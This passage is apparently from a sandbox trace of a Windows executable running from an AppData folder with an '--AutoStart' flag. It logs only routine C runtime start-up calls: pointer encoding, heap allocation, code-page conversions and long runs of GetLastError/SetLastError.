(lpModuleName="KERNEL32.DLL") returned 0x74ea0000 [0200.958] GetProcAddress (hModule=0x74ea0000, lpProcName="EncodePointer") returned 0x772d0fcb [0200.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74ea0000 [0200.959] GetProcAddress (hModule=0x74ea0000, lpProcName="EncodePointer") returned 0x772d0fcb [0200.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74ea0000 [0200.959] GetProcAddress (hModule=0x74ea0000, lpProcName="EncodePointer") returned 0x772d0fcb [0200.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74ea0000 [0200.959] GetProcAddress (hModule=0x74ea0000, lpProcName="DecodePointer") returned 0x772c9d35 [0200.959] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x214) returned 0x20307d0 [0200.960] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74ea0000 [0200.960] GetProcAddress (hModule=0x74ea0000, lpProcName="DecodePointer") returned 0x772c9d35 [0200.960] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74ea0000 [0200.960] GetProcAddress (hModule=0x74ea0000, lpProcName="EncodePointer") returned 0x772d0fcb [0200.960] GetProcAddress (hModule=0x74ea0000, lpProcName="DecodePointer") returned 0x772c9d35 [0200.960] GetCurrentThreadId () returned 0x560 [0200.960] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0200.960] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x8, Size=0x800) returned 0x20309f0 [0200.960] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0200.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0200.960] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0200.960] SetHandleCount (uNumber=0x20) returned 0x20 [0200.961] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart" [0200.961] GetEnvironmentStringsW () returned 0x641f80* [0200.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1409 [0200.961] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x0, Size=0x581) returned 0x20311f8 [0200.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x20311f8, cbMultiByte=1409, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1409 [0200.961] FreeEnvironmentStringsW (penv=0x641f80) returned 1 [0200.961] GetLastError () returned 0x0 [0200.961] SetLastError (dwErrCode=0x0) [0200.961] GetLastError () returned 0x0 [0200.961] SetLastError (dwErrCode=0x0) [0200.961] GetLastError () returned 0x0 [0200.961] SetLastError (dwErrCode=0x0) [0200.962] GetACP () returned 0x4e4 [0200.962] RtlAllocateHeap (HeapHandle=0x2030000, Flags=0x0, Size=0x220) returned 0x2031788 [0200.962] GetLastError () returned 0x0 [0200.962] SetLastError (dwErrCode=0x0) [0200.962] IsValidCodePage (CodePage=0x4e4) returned 1 [0200.962] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0200.962] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0200.962] GetLastError () returned 0x0 [0200.962] SetLastError (dwErrCode=0x0) [0200.962] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0200.962] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0200.962] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0200.962] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0200.962] GetLastError () returned 0x0 [0200.962] SetLastError (dwErrCode=0x0) [0200.962] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0200.962] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0200.962] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䑒?멯@Ā") returned 256 [0200.962] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䑒?멯@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0200.962] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䑒?멯@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0200.962] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¼ú\x99°\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0200.962] GetLastError () returned 0x0 [0200.962] SetLastError (dwErrCode=0x0) [0200.962] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0200.962] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䑒?멯@Ā") returned 256 [0200.962] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䑒?멯@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0200.962] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䑒?멯@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0200.963] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ¼ú\x99°\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0200.963] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4a6b40, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmjek7fnkhtt.exe")) returned 0x65 [0200.963] GetLastError () returned 0x0 [0200.963] SetLastError (dwErrCode=0x0) [0200.963] GetLastError () returned 0x0 [0200.963] SetLastError (dwErrCode=0x0) [0200.963] GetLastError () returned 0x0 [0200.963] SetLastError (dwErrCode=0x0) [0200.963] GetLastError () returned 0x0 [0200.963] SetLastError (dwErrCode=0x0) [0200.963] GetLastError () returned 0x0 [0200.963] SetLastError (dwErrCode=0x0) [0200.963] GetLastError () returned 0x0 [0200.963] SetLastError (dwErrCode=0x0) [0200.963] GetLastError () returned 0x0 [0200.963] SetLastError (dwErrCode=0x0) [0200.963] GetLastError () returned 0x0 [0200.963] SetLastError (dwErrCode=0x0) [0200.963] GetLastError () returned 0x0 [0200.964] SetLastError (dwErrCode=0x0) [0200.964] GetLastError () returned 0x0 [0200.964] SetLastError (dwErrCode=0x0) [0200.964] GetLastError () returned 0x0 [0200.964] SetLastError (dwErrCode=0x0) [0200.964] GetLastError () returned 0x0 [0200.964] SetLastError (dwErrCode=0x0) [0200.964] GetLastError () returned 0x0 [0200.964] SetLastError (dwErrCode=0x0) [0200.964] GetLastError () returned 0x0 [0200.964] SetLastError (dwErrCode=0x0) [0200.964] GetLastError () returned 0x0 [0200.964] SetLastError (dwErrCode=0x0) [0200.964] GetLastError () returned 0x0 [0200.964] SetLastError (dwErrCode=0x0) [0200.964] GetLastError () returned 0x0 [0200.964] SetLastError (dwErrCode=0x0) [0200.964] GetLastError () returned 0x0 [0200.964] SetLastError (dwErrCode=0x0) [0200.964] GetLastError () returned 0x0 [0200.964] SetLastError (dwErrCode=0x0) [0200.964] GetLastError () returned 0x0 [0200.964] SetLastError (dwErrCode=0x0) [0200.965] GetLastError () returned 0x0 [0200.965] SetLastError (dwErrCode=0x0) [0200.965] GetLastError () returned 0x0 [0200.965] SetLastError (dwErrCode=0x0) [0200.965] GetLastError () returned 0x0 [0200.965] SetLastError (dwErrCode=0x0) [0200.965] GetLastError () returned 0x0 [0200.965] SetLastError (dwErrCode=0x0) [0200.965] GetLastError () returned 0x0 [0200.965] SetLastError (dwErrCode=0x0) [0200.965] GetLastError () returned 0x0 [0200.965] SetLastError (dwErrCode=0x0) [0200.965] GetLastError () returned 0x0 [0200.965] SetLastError (dwErrCode=0x0) [0200.965] GetLastError () returned 0x0 [0200.965] SetLastError (dwErrCode=0x0) [0200.965] GetLastError () returned 0x0 [0200.965] SetLastError (dwErrCode=0x0) [0200.965] GetLastError () returned 0x0 [0200.965] SetLastError (dwErrCode=0x0) [0200.965] GetLastError () returned 0x0 [0200.965] SetLastError (dwErrCode=0x0) [0200.965] GetLastError () returned 0x0 [0200.966] SetLastError (dwErrCode=0x0) [0200.966] GetLastError () returned 0x0 [0200.966] SetLastError (dwErrCode=0x0) [0200.966] GetLastError () returned 0x0 [0200.966] SetLastError (dwErrCode=0x0) [0200.966] GetLastError () returned 0x0 [0200.966] SetLastError (dwErrCode=0x0) [0200.966] GetLastError () returned 0x0 [0200.966] SetLastError (dwErrCode=0x0) [0200.966] GetLastError () returned 0x0 [0200.966] SetLastError (dwErrCode=0x0) [0200.966] GetLastError () returned 0x0 [0200.966] SetLastError (dwErrCode=0x0) [0200.966] GetLastError () returned 0x0 [0200.966] SetLastError (dwErrCode=0x0) [0200.966] GetLastError () returned 0x0 [0200.966] SetLastError (dwErrCode=0x0) [0200.966] GetLastError () returned 0x0 [0200.966] SetLastError (dwErrCode=0x0) [0200.966] GetLastError () returned 0x0 [0200.966] SetLastError (dwErrCode=0x0) [0200.966] GetLastError () returned 0x0 [0200.967] SetLastError (dwErrCode=0x0) [0200.967] GetLastError () returned 0x0 [0200.967] SetLastError (dwErrCode=0x0) [0200.967] GetLastError () returned 0x0 [0200.967] SetLastError (dwErrCode=0x0) [0200.967] GetLastError () returned 0x0 [0200.967] SetLastError (dwErrCode=0x0) [0200.967] GetLastError () returned 0x0 [0200.967] SetLastError (dwErrCode=0x0) [0200.967] GetLastError () returned 0x0 [0200.967] SetLastError (dwErrCode=0x0) [0200.967] GetLastError () returned 0x0 [0200.967] SetLastError (dwErrCode=0x0) [0200.967] GetLastError () returned 0x0 [0200.967] SetLastError (dwErrCode=0x0) [0200.967] GetLastError () returned 0x0 [0200.967] SetLastError (dwErrCode=0x0) [0200.967] GetLastError () returned 0x0 [0200.967] SetLastError (dwErrCode=0x0) [0200.967] GetLastError () returned 0x0 [0200.967] SetLastError (dwErrCode=0x0) [0200.967] GetLastError () returned 0x0 [0200.968] SetLastError (dwErrCode=0x0) [0200.968] GetLastError () returned 0x0 [0200.968] SetLastError (dwErrCode=0x0) [0200.968] GetLastError () returned 0x0 [0200.968] SetLastError (dwErrCode=0x0) [0200.968] GetLastError () returned 0x0 [0200.968] SetLastError (dwErrCode=0x0) [0200.968] GetLastError () returned 0x0 [0200.968] SetLastError (dwErrCode=0x0) [0200.968] GetLastError () returned 0x0 [0200.968] SetLastError (dwErrCode=0x0) [0200.968] GetLastError () returned 0x0 [0200.968] SetLastError (dwErrCode=0x0) [0200.968] GetLastError () returned 0x0 [0200.968] SetLastError (dwErrCode=0x0) [0200.968] GetLastError () returned 0x0 [0200.968] SetLastError (dwErrCode=0x0) [0200.968] GetLastError () returned 0x0 [0200.968] SetLastError (dwErrCode=0x0) [0200.968] GetLastError () returned 0x0 [0200.968] SetLastError (dwErrCode=0x0) [0200.968] GetLastError () returned 0x0 [0200.969] SetLastError (dwErrCode=0x0) [0200.969] GetLastError () returned 0x0 [0200.969] SetLastError (dwErrCode=0x0) [0200.969] GetLastError () returned 0x0 [0200.969] SetLastError (dwErrCode=0x0) [0200.969] GetLastError () returned 0x0 [0200.969] SetLastError (dwErrCode=0x0) [0200.969] GetLastError () returned 0x0 [0200.969] SetLastError (dwErrCode=0x0) [0200.969] GetLastError () returned 0x0 [0200.969] SetLastError (dwErrCode=0x0) [0200.969] GetLastError () returned 0x0 [0200.969] SetLastError (dwErrCode=0x0) [0200.969] GetLastError () returned 0x0 [0200.969] SetLastError (dwErrCode=0x0) [0200.969] GetLastError () returned 0x0 [0200.969] SetLastError (dwErrCode=0x0) [0200.969] GetLastError () returned 0x0 [0200.969] SetLastError (dwErrCode=0x0) [0200.969] GetLastError () returned 0x0 [0200.969] SetLastError (dwErrCode=0x0) [0200.969] GetLastError () returned 0x0 [0200.969] SetLastError (dwErrCode=0x0) [0200.969] GetLastError () returned 0x0 [0200.970] SetLastError (dwErrCode=0x0) [0200.970] GetLastError () returned 0x0 [0200.970] SetLastError (dwErrCode=0x0) [0200.970] GetLastError () returned 0x0 [0200.970] SetLastError (dwErrCode=0x0) [0200.970] GetLastError () returned 0x0 [0200.970] SetLastError (dwErrCode=0x0) [0200.970] GetLastError () returned 0x0 [0200.970] SetLastError (dwErrCode=0x0) [0200.970] GetLastError () returned 0x0 [0200.970] SetLastError (dwErrCode=0x0) [0200.970] GetLastError () returned 0x0 [0200.970] SetLastError (dwErrCode=0x0) [0200.970] GetLastError () returned 0x0 [0200.970] SetLastError (dwErrCode=0x0) [0200.970] GetLastError () returned 0x0 [0200.970] SetLastError (dwErrCode=0x0) [0200.970] GetLastError () returned 0x0 [0200.970] SetLastError (dwErrCode=0x0) [0200.970] GetLastError () returned 0x0 [0200.970] SetLastError (dwErrCode=0x0) [0200.970] GetLastError () returned 0x0 [0200.971] SetLastError (dwErrCode=0x0) [0200.971] GetLastError () returned 0x0 [0200.971] SetLastError (dwErrCode=0x0) [0200.971] GetLastError () returned 0x0 [0200.971] SetLastError (dwErrCode=0x0) [0200.971] GetLastError () returned 0x0 [0200.971] SetLastError (dwErrCode=0x0) [0200.971] GetLastError () returned 0x0 [0200.971] SetLastError (dwErrCode=0x0) [0200.971] 